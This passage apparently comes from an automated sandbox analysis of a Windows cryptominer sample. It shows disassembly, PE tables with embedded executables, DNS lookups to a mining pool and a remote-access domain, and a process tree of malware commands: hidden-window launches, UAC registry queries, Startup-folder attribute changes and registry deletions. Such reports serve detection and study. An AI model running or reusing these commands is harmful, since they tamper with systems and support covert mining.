                                                    lea edx, dword ptr [ebp-18h]
                                                    xor eax, eax
                                                    call 00007F0208E711DFh
                                                    mov edx, dword ptr [ebp-18h]
                                                    pop eax
                                                    call 00007F0208E7281Eh
                                                    jne 00007F0208E8225Dh
                                                    call 00007F0208E81C97h
                                                    mov eax, 0000000Ah
                                                    call 00007F0208E81239h
                                                    jmp 00007F0208E82288h
                                                    lea edx, dword ptr [ebp-1Ch]
                                                    mov eax, 00000001h
                                                    call 00007F0208E711B6h
                                                    mov eax, dword ptr [ebp-1Ch]
                                                    push eax
                                                    lea edx, dword ptr [ebp-20h]
                                                    xor eax, eax
                                                    call 00007F0208E711A8h
                                                    mov edx, dword ptr [ebp-20h]
                                                    pop eax
                                                    call 00007F0208E727E7h
                                                    jne 00007F0208E822B5h
                                                    lea edx, dword ptr [ebp-24h]
                                                    mov eax, 00000001h
                                                    call 00007F0208E7118Ch
                                                    mov eax, dword ptr [ebp-24h]
                                                    push eax
                                                    lea eax, dword ptr [ebp-28h]
                                                    push eax
                                                    lea edx, dword ptr [ebp-2Ch]
                                                    xor eax, eax
                                                    call 00007F0208E7117Ah
                                                    mov eax, dword ptr [ebp-2Ch]
                                                    mov ecx, 00000003h
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x170000xa50.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000xcb38a8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000x18b8.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x190000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    CODE0x10000x130440x13200f244922fda075765e8f17189a4294935False0.5482792075163399data6.435944838336945IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    DATA0x150000x60c0x800d769b11b951aa1676a9b56ed8657f9e0False0.388671875data3.518626014393411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    BSS0x160000xca50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata0x170000xa500xc00f12761531f848d781df349820c2c9510False0.36328125data4.261862699947735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .tls0x180000xc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rdata0x190000x180x20084ec229773168945be103e78a704bd09False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    .reloc0x1a0000x18b80x1a004bd4a9c9fd181c01c407ce5b4b897f2dFalse0.7173978365384616data6.528367230126052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1c0000xcb38a80xcb3a006386372ab0a8d94c886e436b2e379007unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x1c5200x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.47326589595375723
                                                    RT_ICON0x1ca880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7639891696750902
                                                    RT_STRING0x1d3300x18edataEnglishUnited States0.5226130653266332
                                                    RT_STRING0x1d4c00x6cdataEnglishUnited States0.49074074074074076
                                                    RT_STRING0x1d52c0x15cdata0.4511494252873563
                                                    RT_STRING0x1d6880x208data0.45
                                                    RT_STRING0x1d8900xecdata0.5550847457627118
                                                    RT_STRING0x1d97c0x198data0.5171568627450981
                                                    RT_STRING0x1db140x3b4data0.33649789029535865
                                                    RT_STRING0x1dec80x37cdata0.4080717488789238
                                                    RT_STRING0x1e2440x2a0data0.4017857142857143
                                                    RT_RCDATA0x1e4e40xb200PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.9310919943820225
                                                    RT_RCDATA0x296e40x15a00PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows0.41983155708092484
                                                    RT_RCDATA0x3f0e40x3177d8PE32 executable (GUI) Intel 80386, for MS Windows0.44219398498535156
                                                    RT_RCDATA0x3568bc0x5fe00PE32 executable (console) Intel 80386, for MS Windows0.25558435870273793
                                                    RT_RCDATA0x3b66bc0x105dd1PE32 executable (console) Intel 80386, for MS Windows0.2728891372680664
                                                    RT_RCDATA0x4bc4900x38d0PE32+ executable (native) x86-64, for MS Windows0.5543866886688669
                                                    RT_RCDATA0x4bfd600x7f2200PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows0.44277095794677734
                                                    RT_RCDATA0xcb1f600x1d7bedata0.13911200172233906
                                                    RT_RCDATA0xccf7200x10data1.5
                                                    RT_RCDATA0xccf7300xb0data0.8863636363636364
                                                    RT_RCDATA0xccf7e00xa2data0.7037037037037037
                                                    RT_GROUP_ICON0xccf8840x22dataEnglishUnited States0.9705882352941176
                                                    DLLImport
                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                    user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                    kernel32.dllWriteFile, WaitForSingleObject, VirtualQuery, Sleep, SetFilePointer, SetEvent, SetEndOfFile, ResetEvent, ReadFile, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GetVersionExA, GetTickCount, GetThreadLocale, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCPInfo, GetACP, FreeLibrary, FormatMessageA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeviceIoControl, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                    user32.dllMessageBoxA, LoadStringA, GetSystemMetrics, CharNextA, CharToOemA
                                                    kernel32.dllSleep
                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                    winmm.dllwaveOutGetNumDevs
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 4, 2024 18:09:40.169636011 CEST5590853192.168.2.51.1.1.1
                                                    Jul 4, 2024 18:09:40.180214882 CEST53559081.1.1.1192.168.2.5
                                                    Jul 4, 2024 18:09:44.791421890 CEST5102353192.168.2.51.1.1.1
                                                    Jul 4, 2024 18:09:44.802342892 CEST53510231.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 4, 2024 18:09:40.169636011 CEST192.168.2.51.1.1.10x809cStandard query (0)auth11.aeroadmin.comA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 18:09:44.791421890 CEST192.168.2.51.1.1.10x4815Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 4, 2024 18:09:40.180214882 CEST1.1.1.1192.168.2.50x809cNo error (0)auth11.aeroadmin.com89.40.115.70A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 18:09:44.802342892 CEST1.1.1.1192.168.2.50x4815No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 18:09:44.802342892 CEST1.1.1.1192.168.2.50x4815No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:12:08:53
                                                    Start date:04/07/2024
                                                    Path:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\K4gsPJGEi4.exe"
                                                    Imagebase:0x400000
                                                    File size:13'410'304 bytes
                                                    MD5 hash:997F25415B30C6DA407A75C55806D752
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:12:08:56
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\find.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\find.exe "0x0"
                                                    Imagebase:0x7f0000
                                                    File size:14'848 bytes
                                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:12:08:57
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"
                                                    Imagebase:0xb70000
                                                    File size:147'456 bytes
                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:12:08:57
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:12:08:57
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:12:08:57
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:12:08:58
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:12:08:58
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"
                                                    Imagebase:0xb70000
                                                    File size:147'456 bytes
                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:12:08:58
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:16
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:17
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\screen.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
                                                    Imagebase:0x400000
                                                    File size:45'568 bytes
                                                    MD5 hash:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 12%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\findstr.exe /i /c:"Local"
                                                    Imagebase:0x710000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\findstr.exe /i /c:"'"
                                                    Imagebase:0x710000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:12:08:59
                                                    Start date:04/07/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\screen.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
                                                    Imagebase:0x400000
                                                    File size:45'568 bytes
                                                    MD5 hash:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:12:09:00
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:12:09:00
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                    Wow64 process (32bit):true
                                                    Commandline:chcp 65001
                                                    Imagebase:0xd20000
                                                    File size:12'800 bytes
                                                    MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:12:09:01
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:12:09:02
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\timeout.exe /t 1
                                                    Imagebase:0x560000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                    Imagebase:0x930000
                                                    File size:19'456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:12:09:03
                                                    Start date:04/07/2024
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                                                    Imagebase:0x520000
                                                    File size:59'392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

